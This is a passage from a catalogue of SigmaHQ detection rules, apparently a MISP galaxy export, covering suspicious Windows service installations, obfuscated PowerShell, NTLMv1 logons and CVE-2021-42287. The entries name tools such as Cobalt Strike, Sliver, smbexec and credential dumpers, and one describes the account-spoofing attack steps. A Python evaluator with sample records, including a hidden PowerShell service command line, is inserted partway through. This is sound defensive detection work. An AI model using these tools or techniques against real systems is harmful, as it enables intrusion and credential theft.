  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 9186. Table References

Links

https://github.com/antonioCoco/JuicyPotatoNG

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml

NTLMv1 Logon Between Client and Server

Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.

The tag is: misp-galaxy:sigma-rules="NTLMv1 Logon Between Client and Server"

NTLMv1 Logon Between Client and Server has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 9187. Table References

Links

https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml

Potential CVE-2021-42287 Exploitation Attempt

The attacker creates a computer object, using the default permissions that let domain users add computer accounts, with a password known to her. She then clears the ServicePrincipalName attribute on the computer object. Because she created the object (CREATOR OWNER), she is granted additional permissions and can make many changes to the object.

The tag is: misp-galaxy:sigma-rules="Potential CVE-2021-42287 Exploitation Attempt"

Potential CVE-2021-42287 Exploitation Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 9188. Table References

Links

https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_directory_services_sam/win_system_exploit_cve_2021_42287.yml

smbexec.py Service Installation

Detects the use of smbexec.py tool by detecting a specific service installation

The tag is: misp-galaxy:sigma-rules="smbexec.py Service Installation"

smbexec.py Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9189. Table References

Links

https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60

https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296

https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_hack_smbexec.yml

Invoke-Obfuscation Via Stdin - System

Detects Obfuscated Powershell via Stdin in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Stdin - System"

Invoke-Obfuscation Via Stdin - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9190. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml

Meterpreter or Cobalt Strike Getsystem Service Installation - System

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

The tag is: misp-galaxy:sigma-rules="Meterpreter or Cobalt Strike Getsystem Service Installation - System"

Meterpreter or Cobalt Strike Getsystem Service Installation - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

Table 9191. Table References

Links

https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml

Remote Access Tool Services Have Been Installed - System

Detects service installation of different remote access tool software. Such software is often abused by threat actors to perform

The tag is: misp-galaxy:sigma-rules="Remote Access Tool Services Have Been Installed - System"

Remote Access Tool Services Have Been Installed - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9192. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml

Anydesk Remote Access Software Service Installation

Detects the installation of the AnyDesk software service, which could indicate AnyDesk abuse if the software is not already in use in the environment.

The tag is: misp-galaxy:sigma-rules="Anydesk Remote Access Software Service Installation"

Table 9193. Table References

Links

https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_anydesk.yml

Important Windows Service Terminated Unexpectedly

Detects important or interesting Windows services that got terminated unexpectedly.

The tag is: misp-galaxy:sigma-rules="Important Windows Service Terminated Unexpectedly"

Table 9194. Table References

Links

https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml

New PDQDeploy Service - Client Side

Detects PDQDeploy service installation on the target system. When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1

The tag is: misp-galaxy:sigma-rules="New PDQDeploy Service - Client Side"

New PDQDeploy Service - Client Side has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9195. Table References

Links

https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml

RemCom Service Installation

Detects RemCom service installation and execution events

The tag is: misp-galaxy:sigma-rules="RemCom Service Installation"

RemCom Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9196. Table References

Links

https://github.com/kavika13/RemCom/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remcom.yml

PAExec Service Installation

Detects PAExec service installation

The tag is: misp-galaxy:sigma-rules="PAExec Service Installation"

PAExec Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9197. Table References

Links

https://www.poweradmin.com/paexec/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_paexec.yml

Invoke-Obfuscation RUNDLL LAUNCHER - System

Detects Obfuscated Powershell via RUNDLL LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation RUNDLL LAUNCHER - System"

Invoke-Obfuscation RUNDLL LAUNCHER - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9198. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml

Invoke-Obfuscation Via Use Rundll32 - System

Detects Obfuscated Powershell via use Rundll32 in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Rundll32 - System"

Invoke-Obfuscation Via Use Rundll32 - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9199. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml

PowerShell Scripts Installed as Services

Detects a PowerShell script installed as a service

The tag is: misp-galaxy:sigma-rules="PowerShell Scripts Installed as Services"

PowerShell Scripts Installed as Services has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9201. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_powershell_script_installed_as_service.yml

CSExec Service Installation

Detects CSExec service installation and execution events

The tag is: misp-galaxy:sigma-rules="CSExec Service Installation"

CSExec Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9202. Table References

Links

https://github.com/malcomvetter/CSExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml

CobaltStrike Service Installations - System

Detects known malicious service installations that appear when a Cobalt Strike beacon elevates privileges or performs lateral movement

The tag is: misp-galaxy:sigma-rules="CobaltStrike Service Installations - System"

CobaltStrike Service Installations - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9203. Table References

Links

https://www.sans.org/webcasts/119395

https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/

https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml

Suspicious Service Installation

Detects suspicious service installation commands

The tag is: misp-galaxy:sigma-rules="Suspicious Service Installation"

Suspicious Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9204. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_susp.yml

Invoke-Obfuscation COMPRESS OBFUSCATION - System

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation COMPRESS OBFUSCATION - System"

Invoke-Obfuscation COMPRESS OBFUSCATION - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9205. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml

HackTool Service Registration or Execution

Detects the installation or execution of services associated with known hack tools

The tag is: misp-galaxy:sigma-rules="HackTool Service Registration or Execution"

HackTool Service Registration or Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9206. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_hacktools.yml

Invoke-Obfuscation STDIN+ Launcher - System

Detects Obfuscated use of stdin to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation STDIN+ Launcher - System"

Invoke-Obfuscation STDIN+ Launcher - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9207. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml

Moriya Rootkit - System

Detects the use of Moriya rootkit as described in the securelist’s Operation TunnelSnake report

The tag is: misp-galaxy:sigma-rules="Moriya Rootkit - System"

Moriya Rootkit - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9208. Table References

Links

https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_moriya_rootkit.yml

ProcessHacker Privilege Elevation

Detects a ProcessHacker tool that elevated privileges to a very high level

The tag is: misp-galaxy:sigma-rules="ProcessHacker Privilege Elevation"

ProcessHacker Privilege Elevation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9209. Table References

Links

https://twitter.com/1kwpeter/status/1397816101455765504

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml

Mesh Agent Service Installation

Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers

The tag is: misp-galaxy:sigma-rules="Mesh Agent Service Installation"

Mesh Agent Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9210. Table References

Links

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml

Sliver C2 Default Service Installation

Detects the known default service installation that appears when a Sliver implant executes its PsExec command

The tag is: misp-galaxy:sigma-rules="Sliver C2 Default Service Installation"

Sliver C2 Default Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9211. Table References

Links

https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231

https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sliver.yml

Invoke-Obfuscation Obfuscated IEX Invocation - System

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Obfuscated IEX Invocation - System"

Invoke-Obfuscation Obfuscated IEX Invocation - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 9212. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml

Invoke-Obfuscation VAR+ Launcher - System

Detects Obfuscated use of Environment Variables to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR+ Launcher - System"

Invoke-Obfuscation VAR+ Launcher - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9213. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml

New PDQDeploy Service - Server Side

Detects a PDQDeploy service installation, which indicates that PDQDeploy was installed on the machine. PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines

The tag is: misp-galaxy:sigma-rules="New PDQDeploy Service - Server Side"

New PDQDeploy Service - Server Side has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9214. Table References

Links

https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml

Service Installation in Suspicious Folder

Detects a service installation whose binary resides in a suspicious folder (AppData)

The tag is: misp-galaxy:sigma-rules="Service Installation in Suspicious Folder"

Service Installation in Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9215. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder.yml
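The following is an added example, not part of the MISP galaxy export or of the SigmaHQ rules it summarises. It applies three of the service-installation checks described on this page to constructed service-installation records in one small evaluator: the "PDQDeployRunner-X" naming convention from the "New PDQDeploy Service - Client Side" entry (X an integer starting from 1), the "PowerShell Scripts Installed as Services" check, and the AppData folder check from the "Service Installation in Suspicious Folder" entry above. The log source (System log Event ID 7045 from the Service Control Manager), the record fields, the PowerShell and AppData indicators and all sample records are assumptions of this example, not taken from the page or from the rules' own selections.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Assumed log source (not stated on the page): System log, Service Control
# Manager, Event ID 7045 "A service was installed in the system".
SERVICE_INSTALL_EVENT_ID = 7045


@dataclass(frozen=True)
class ServiceInstallEvent:
    event_id: int
    service_name: str
    image_path: str


# Check 1: PDQDeploy client-side runner. The rule description states the
# service is named "PDQDeployRunner-X" with X an integer starting from 1,
# so a leading zero or a missing number does not match.
PDQ_RUNNER = re.compile(r"^PDQDeployRunner-[1-9]\d*$", re.IGNORECASE)

# Check 2: a PowerShell script installed as a service. The indicators used
# here (host executable names and the .ps1 extension) are assumptions.
POWERSHELL_MARKERS = ("powershell.exe", "pwsh.exe", ".ps1")

# Check 3: service binary located under a user's AppData folder (assumed
# as the path component "\AppData\").
APPDATA_MARKER = "\\appdata\\"


def _normalised_path(ev: ServiceInstallEvent) -> str:
    # ImagePath values are often quoted; compare case-insensitively.
    return ev.image_path.strip().strip('"').lower()


def matches_pdqdeploy_runner(ev: ServiceInstallEvent) -> bool:
    return PDQ_RUNNER.match(ev.service_name) is not None


def matches_powershell_service(ev: ServiceInstallEvent) -> bool:
    path = _normalised_path(ev)
    return any(marker in path for marker in POWERSHELL_MARKERS)


def matches_appdata_folder(ev: ServiceInstallEvent) -> bool:
    return APPDATA_MARKER in _normalised_path(ev)


CHECKS = (
    ("New PDQDeploy Service - Client Side", matches_pdqdeploy_runner),
    ("PowerShell Scripts Installed as Services", matches_powershell_service),
    ("Service Installation in Suspicious Folder", matches_appdata_folder),
)


def evaluate(events: Iterable[ServiceInstallEvent]) -> Dict[str, List[str]]:
    """Map each installed service name to the names of the checks it triggers.
    Only service-installation events are considered; other System-log
    events are ignored even when their fields look suspicious."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        if ev.event_id != SERVICE_INSTALL_EVENT_ID:
            continue
        fired = [name for name, check in CHECKS if check(ev)]
        if fired:
            hits[ev.service_name] = fired
    return hits


# Constructed sample records (not real logs; paths are illustrative).
SAMPLE_EVENTS = [
    ServiceInstallEvent(7045, "PDQDeployRunner-1", r'"C:\Windows\Temp\PDQDeployRunner-1.exe"'),
    ServiceInstallEvent(7045, "Updater", r'"C:\Users\bob\AppData\Roaming\Updater\updater.exe"'),
    ServiceInstallEvent(7045, "HealthCheck",
                        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -File C:\ProgramData\hc.ps1"),
    # Does not satisfy the "starting from 1" naming rule.
    ServiceInstallEvent(7045, "PDQDeployRunner-0", r"C:\Windows\Temp\runner.exe"),
    ServiceInstallEvent(7045, "Spooler", r"C:\Windows\System32\spoolsv.exe"),
    # A service state-change event (7036), not an installation: ignored.
    ServiceInstallEvent(7036, "Dropper", r"C:\Users\bob\AppData\Local\dropper.exe"),
]

if __name__ == "__main__":
    for service, rules in evaluate(SAMPLE_EVENTS).items():
        print(f"{service}: {', '.join(rules)}")
```

Each check is a plain predicate over one record, so adding another of the service-installation rules from this page (a fixed service name, a path prefix) means appending one function to CHECKS; the evaluator reports every check that fires, which is useful when one installation trips both the PowerShell and the AppData checks.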

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System

Detects Obfuscated Powershell via VAR++ LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System"

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9216. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml

RTCore Suspicious Service Installation

Detects the installation of the RTCore service, which could indicate abuse of the vulnerable Micro-Star (MSI) Afterburner driver

The tag is: misp-galaxy:sigma-rules="RTCore Suspicious Service Installation"

Table 9217. Table References

Links

https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml

Service Installed By Unusual Client - System

Detects a service installed by a client which has PID 0 or whose parent has PID 0

The tag is: misp-galaxy:sigma-rules="Service Installed By Unusual Client - System"

Service Installed By Unusual Client - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9218. Table References

Links

https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml

PsExec Service Installation

Detects PsExec service installation and execution events

The tag is: misp-galaxy:sigma-rules="PsExec Service Installation"

PsExec Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9219. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml

NetSupport Manager Service Install

Detects NetSupport Manager service installation on the target system.

The tag is: misp-galaxy:sigma-rules="NetSupport Manager Service Install"

Table 9220. Table References

Links

http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml

Windows Defender Threat Detection Disabled - Service

Detects that the "Windows Defender Threat Protection" service has been disabled

The tag is: misp-galaxy:sigma-rules="Windows Defender Threat Detection Disabled - Service"

Windows Defender Threat Detection Disabled - Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9221. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_defender_disabled.yml

Suspicious Service Installation Script

Detects suspicious service installation scripts

The tag is: misp-galaxy:sigma-rules="Suspicious Service Installation Script"

Suspicious Service Installation Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9223. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_script.yml

TacticalRMM Service Installation

Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.

The tag is: misp-galaxy:sigma-rules="TacticalRMM Service Installation"

TacticalRMM Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9224. Table References

Links

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml

Credential Dumping Tools Service Execution - System

Detects well-known credential dumping tools execution via service execution events

The tag is: misp-galaxy:sigma-rules="Credential Dumping Tools Service Execution - System"

Credential Dumping Tools Service Execution - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9225. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_mal_creddumper.yml

KrbRelayUp Service Installation

Detects service creation by the KrbRelayUp tool, used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default setting)

The tag is: misp-galaxy:sigma-rules="KrbRelayUp Service Installation"

KrbRelayUp Service Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9226. Table References

Links

https://github.com/Dec0ne/KrbRelayUp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml

Invoke-Obfuscation Via Use MSHTA - System

Detects obfuscated PowerShell via use of MSHTA in scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use MSHTA - System"

Invoke-Obfuscation Via Use MSHTA - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9227. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml

Uncommon Service Installation Image Path

Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded PowerShell commands, temporary paths, etc.

The tag is: misp-galaxy:sigma-rules="Uncommon Service Installation Image Path"

Uncommon Service Installation Image Path has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9228. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_uncommon.yml

Invoke-Obfuscation Via Use Clip - System

Detects obfuscated PowerShell via use of Clip.exe in scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Clip - System"

Invoke-Obfuscation Via Use Clip - System has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9229. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml

Invoke-Obfuscation CLIP+ Launcher - System

Detects obfuscated use of Clip.exe to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation CLIP+ Launcher - System"

Invoke-Obfuscation CLIP+ Launcher - System has relationships with:

